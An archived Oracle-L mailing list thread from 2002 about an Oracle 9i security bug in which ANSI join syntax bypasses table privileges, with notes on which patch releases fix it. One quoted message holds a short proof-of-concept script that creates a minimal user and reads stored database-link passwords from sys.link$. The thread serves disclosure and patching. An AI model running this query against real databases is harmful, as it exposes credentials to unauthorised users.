| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
 |
 | |||
| Oracle FAQ | Your Portal to the Oracle Knowledge Grid | |
|
| |||
Home -> Community -> Mailing Lists -> Oracle-L -> RE: security bug - join syntax
Bug is fixed in 9.0.1.3 (or was it .2, I forget), and is not present in 9.2
(9iR2).
A backport for 9.0.1.1 is available as I recall.
Robert G. Freeman - Oracle OCP
Oracle Database Architect
CSX Midtier Database Administration
Author
Oracle9i RMAN Backup and Recovery (Oracle Press - Oct 2002)
Oracle9i New Features (Oracle Press)
Mastering Oracle8i (Sybex)
Clark Griswold: Eddie, has anyone ever told you that you're bad luck? Cousin Eddie: Those were my mother's dying words. But I guess if your body's covered in third degree burns, and your foot's caught in a bear trap, you tend to start talkin' crazy.
-----Original Message-----
Sent: Friday, July 19, 2002 2:58 PM
To: Multiple recipients of list ORACLE-L
Is this still a problem in 9iR2? I do not have it installed yet :(
> -----Original Message-----
> From: Jared.Still_at_radisys.com [SMTP:Jared.Still_at_radisys.com]
> Sent: Friday, July 19, 2002 12:05 PM
> To: Multiple recipients of list ORACLE-L
> Subject: Re: security bug - join syntax
>
> Thanks Linda.
>
> Usenet seems to be a little behind the curve though.
>
> Jonathan Lewis discovered this and posted on the list
> ( you saw it here first! ) over a month ago.
>
> Jared
>
>
>
>
>
> Linda.Miller-Coker_at_jpmorgan.com
> Sent by: root_at_fatcity.com
> 07/19/2002 09:23 AM
> Please respond to ORACLE-L
>
>
> To: Multiple recipients of list ORACLE-L
> <ORACLE-L_at_fatcity.com>
> cc:
> Subject: Re: security bug - join syntax
>
>
>
> This just in from comp.databases.oracle.server.
>
> See metalink bug 2121935.
>
> Using ANSI syntax joins (CROSS JOIN, LEFT OUTER etc)
> allows you to view data from tables on which you have no
> privilege. For example, try this COMPLETE script:
>
> connect / as sysdba
> create user us1 identified by us1;
> grant create session to us1;
>
> connect us1/us1
>
> select userid, password
> from
> sys.link$ cross join dual
> ;
>
>
>
>
> "Adams, Matthew (GEA, MABG, 088130)" <MATT.ADAMS_at_APPL.GE.COM>@fatcity.com
> on 07/19/2002 11:04:17 AM
>
> Please respond to ORACLE-L_at_fatcity.com
>
>
>
> Sent by: root_at_fatcity.com
>
>
> To: Multiple recipients of list ORACLE-L <ORACLE-L_at_fatcity.com>
> cc:
>
>
>
>
> Anybody remember the bug number for the security issue
> with the new join syntax in 9i?
>
> ----
> Matt Adams - GE Appliances - matt.adams_at_appl.ge.com
> The ozone layer or cheese in a spray can.
> Don't make me choose.
>
>
>
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author:
> INET: Linda.Miller-Coker_at_jpmorgan.com
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
>
>
>
> --
> Please see the official ORACLE-L FAQ: http://www.orafaq.com
> --
> Author:
> INET: Jared.Still_at_radisys.com
>
> Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051
> San Diego, California -- Public Internet access / Mailing Lists
> --------------------------------------------------------------------
> To REMOVE yourself from this mailing list, send an E-Mail message
> to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
> the message BODY, include a line containing: UNSUB ORACLE-L
> (or the name of mailing list you want to be removed from). You may
> also send the HELP command for other information (like subscribing).
-- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Deshpande, Kirti INET: kirti.deshpande_at_verizon.com Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists -------------------------------------------------------------------- To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing). -- Please see the official ORACLE-L FAQ: http://www.orafaq.com -- Author: Freeman, Robert INET: Robert_Freeman_at_csx.com Fat City Network Services -- (858) 538-5051 FAX: (858) 538-5051 San Diego, California -- Public Internet access / Mailing Lists -------------------------------------------------------------------- To REMOVE yourself from this mailing list, send an E-Mail message to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in the message BODY, include a line containing: UNSUB ORACLE-L (or the name of mailing list you want to be removed from). You may also send the HELP command for other information (like subscribing).Received on Mon Jul 22 2002 - 13:18:44 CDT
 |
 |